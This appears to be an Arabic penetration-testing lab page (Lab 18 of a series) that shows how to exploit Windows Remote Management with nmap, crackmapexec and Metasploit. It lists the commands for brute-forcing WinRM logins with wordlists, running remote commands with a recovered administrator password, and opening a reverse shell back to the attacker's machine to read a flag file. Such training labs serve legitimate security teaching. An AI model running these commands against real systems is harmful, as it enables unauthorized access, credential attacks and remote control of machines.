🧪 المختبر 18: استغلال WinRM على Windows (باستخدام Metasploit)
nmap -p 5985 <Target_IP>استخدام `crackmapexec` لتأكيد تشغيل WinRM واختبار الأوامر.crackmapexec winrm <Target_IP> -u administrator -p password -x "whoami"
msfconsole -quse auxiliary/scanner/winrm/winrm_login set RHOSTS <Target_IP> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false exploit
use auxiliary/scanner/winrm/winrm_cmd set RHOSTS <Target_IP> set USERNAME administrator set PASSWORD Tinkerbell set CMD whoami exploit
use exploit/windows/winrm/winrm_script_exec set RHOSTS set USERNAME administrator set PASSWORD Tinkerbell set FORCE_VBS_CMD_STAGER true set LHOST <Your_Kali_IP> set LPORT 4444 exploit
getuid shell type C:\flag.txt
Previous🧪 المختبر 17: اختراق خدمة RDP غير الآمنة على Windows (Brute-Force Lab)Next🧪 المختبر 19: استغلال EternalBlue (MS17-010) على Windows (باستخدام Metasploit)
Last updated

